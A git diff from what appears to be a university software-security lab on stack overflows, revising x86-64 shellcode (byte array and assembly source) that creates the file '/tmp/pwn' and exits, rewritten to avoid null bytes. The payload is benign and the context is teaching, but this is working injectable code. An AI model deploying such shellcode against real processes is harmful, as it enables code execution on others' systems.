diff --git a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/exploit.c b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/exploit.c
index a06e163..d595983 100644
--- a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/exploit.c
+++ b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/exploit.c
@@ -2,7 +2,7 @@
 #include <stdio.h>
 
 unsigned char exploit[1024] = {
-0xeb,0x24,0x48,0x31,0xff,0x5f,0x68,0xb6,0x01,0x00,0x00,0x48,0x31,0xf6,0x5e,0x6a,0x55,0x58,0x0f,0x05,0x48,0x31,0xc0,0x48,0x31,0xff,0x6a,0x2a,0x5f,0x6a,0x3d,0x58,0x48,0x8d,0x40,0xff,0x0f,0x05,0xe8,0xd7,0xff,0xff,0xff,0x2f,0x74,0x6d,0x70,0x2f,0x70,0x77,0x6e,0x00
+0xeb,0x2b,0x48,0x31,0xff,0x5f,0x68,0x4b,0xfe,0xff,0xff,0x48,0x31,0xf6,0x5e,0x48,0xf7,0xde,0x48,0x83,0xc6,0x01,0x6a,0x55,0x58,0x0f,0x05,0x48,0x31,0xc0,0x48,0x31,0xff,0x6a,0x2a,0x5f,0x6a,0x3d,0x58,0x48,0x8d,0x40,0xff,0x0f,0x05,0xe8,0xd0,0xff,0xff,0xff,0x2f,0x74,0x6d,0x70,0x2f,0x70,0x77,0x6e
 };
 
 int main(void) {
diff --git a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/shellcode.S b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/shellcode.S
index 1c771d2..aa0e44b 100644
--- a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/shellcode.S
+++ b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/shellcode.S
@@ -3,14 +3,15 @@
 
 _start:
     jmp indirect
-    
+
 p:
-    xorq %rdi, %rdi
+    xor %rdi, %rdi
     pop %rdi
-    #shr $0x8, %rdi
-    push $0x1b6
+    push $0xfffffffffffffe4b
     xor %rsi, %rsi
     pop %rsi
+    neg %rsi
+    add $1, %rsi
     push $85
     pop %rax
     syscall
@@ -26,4 +27,4 @@ p:
 
 indirect:
     call p
-	.asciz "/tmp/pwn"
+	.ascii "/tmp/pwn"